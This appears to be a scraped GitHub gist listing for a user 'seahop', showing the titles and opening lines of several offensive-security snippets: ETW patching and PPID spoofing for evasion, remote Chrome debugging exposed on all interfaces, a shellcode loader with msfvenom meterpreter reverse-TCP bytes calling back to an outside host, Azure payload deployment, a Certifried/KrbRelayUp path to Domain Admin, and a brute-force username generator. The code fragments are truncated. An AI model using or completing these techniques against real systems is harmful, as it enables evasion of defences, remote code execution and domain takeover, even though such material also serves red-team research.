Start Chrome with the following flags:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
--remote-debugging-port=9222
--remote-debugging-address=0.0.0.0
Sean Hopkins seahop
seahop
/ PatchETW.cs
Last active
February 17, 2024 14:22
ETW patching in C#. Based on https://www.phrack.me/tools/2023/04/10/Patching-ETW-in-C.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using DInvoke.DynamicInvoke; | |
| namespace PatchETW | |
| { | |
| public static class Native | |
| { |
seahop
/ PPID Spoof & BlockDLLs
Created
November 7, 2023 16:00
— forked from rasta-mouse/PPID Spoof & BlockDLLs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
seahop
/ Instructions.md
Created
June 17, 2023 13:21
— forked from NotMedic/Instructions.md
Headless Remote Chrome Debugging - Ichabod Chrome :)
seahop
/ Entry.c
Created
May 5, 2023 01:31
— forked from realoriginal/Entry.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| D_SEC( A ) NTSTATUS NTAPI Entry( _In_ PVOID Parameter ) | |
| { | |
| PARSED_BUF Psr; | |
| UINT32 Wrt = 0; | |
| PARG Arg = NULL; | |
| LPWSTR Nps = NULL; | |
| HANDLE Pip = NULL; |
seahop
/ RtlRunOnceExecuteOnceShellcodeExec.c
Created
April 6, 2023 15:48
— forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context); | |
| typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context); | |
| // msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c | |
| unsigned char shellcode_bin[] = | |
| "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" | |
| "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
seahop
/ RtlRunOnceExecuteOnceShellcodeExec.c
Created
April 6, 2023 15:48
— forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context); | |
| typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context); | |
| // msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c | |
| unsigned char shellcode_bin[] = | |
| "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" | |
| "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" |
seahop
/ AzureInitialAccess.html
Created
September 14, 2022 04:45
— forked from khyberspache/AzureInitialAccess.html
Deploy payloads onto Azure VMs :)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div id="plugin-header" class="profile-heading-container"> | |
| <div class="body"> | |
| <strong class="profile-heading">Initial access on Azure resources</strong> | |
| <p> | |
| Use Operator to get initial access on your Azure deployed resources. This will allow you deploy Pneuma (or PneumaEX for professional license holders) onto | |
| virtual machines running in Resource Groups on Microsoft Azure. | |
| </p> | |
| </div> | |
| </div> |
seahop
/ certifried_with_krbrelayup.md
Created
May 17, 2022 01:26
— forked from tothi/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.
The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.
Prerequisites:
seahop
/ namemash.py
Created
August 15, 2021 19:41
— forked from superkojiman/namemash.py
Creating a user name list for brute force attacks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| import os.path | |
| if __name__ == "__main__": | |
| if len(sys.argv) != 2: | |
| print("usage: {} names.txt".format((sys.argv[0]))) | |
| sys.exit(0) | |
| if not os.path.exists(sys.argv[1]): |